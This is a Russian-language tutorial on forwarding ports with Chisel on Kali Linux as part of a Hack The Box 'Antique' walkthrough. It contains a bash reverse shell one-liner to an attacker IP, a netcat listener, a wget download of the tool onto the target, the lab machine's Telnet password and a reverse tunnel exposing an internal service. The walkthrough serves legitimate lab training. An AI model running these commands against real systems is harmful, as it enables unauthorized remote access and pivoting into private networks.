Мы уже рассказывали про проброс портов на Kali Linux при помощи Localtunnel. Сегодня, в рамках прохождения уязвимой машины Antique Hack The Box, я познакомлю вас с еще одним способом перенаправления портов на Kali Linux, с помощью инструмента Chisel.
Еще по теме: Использование Pwncat (Netcat на максималках)
Использование Chisel для перенаправления портов на Kali
При пентесте и постэксплуатации одна из важных задач — проброс портов. Для этой цели отлично подходит Chisel, который часто используется многими пентестерами.
Установка Chisel на Kali Linux
Перейдите на GitHub и скачайте Chisel на Kali Linux (необходимо загрузить файл amd64):
https://github.com/jpillora/chisel
Использование Chisel на Kali Linux
После скачивания, разархивируйте файл:
1 |
gunzip chisel_1.7.7_linux_amd64.gz |
Запустите сервер Python на порту 80:
1 |
python3 -m http.server 80 |
Измените права на доступ к файлу:
1 |
chmod 777 chisel_1.7.7_linux_amd64.gz |
Настройте сервер chisel на порт 5000:
1 |
./ chisel_1.7.7_linux_amd64.gz server -p 5000 --reverse |
Затем после аутентификации через Telnet с полученным паролем: P@ssw0rd@123!!123, выполняем реверс-шелл. После входа в Telnet используем обратный шелл с помощью команды exec, здесь мы используем однострочной обратный шелл bash.
Перед выполнением однострочника bash, не забудьте включить листенер netcat на порту 1234.
Kali терминал 1:
1 |
telnet 10.129.33.36 |
Kali терминал 2:
1 |
Nc -nlvp 1234 |
Kali терминал 1:
1 |
exec bash -c 'bash -i >& /dev/tcp/10.10.14.93/1234 0>&1' |
Далее скачиваем chisel во временную папку systems/tmp целевой системы.
1 |
wget 10.10.14.93/chisel_1.7.7_linux_amd64 |
После загрузки, изменим права к доступу файла, чтобы можно было его запустить. Также нужно изменить настройки клиента chisel, такие как наш IP-адрес (10.10.14.93) и порт сервера chisel (5000), удаленный порт (5432), где мы хотим получить доступ к службе, вместо локального хоста и локального внутреннего порта (631), который мы хотим перенаправить.
1 |
./chisel_1.7.7_linux_amd64 client 10.10.14.93:5000 R:5432:localhost:631 |
После перенаправления порта, можно будет получить к нему доступ из Kali Linux через локальный хост через IP или порт 5432.
ПОЛЕЗНЫЕ ССЫЛКИ: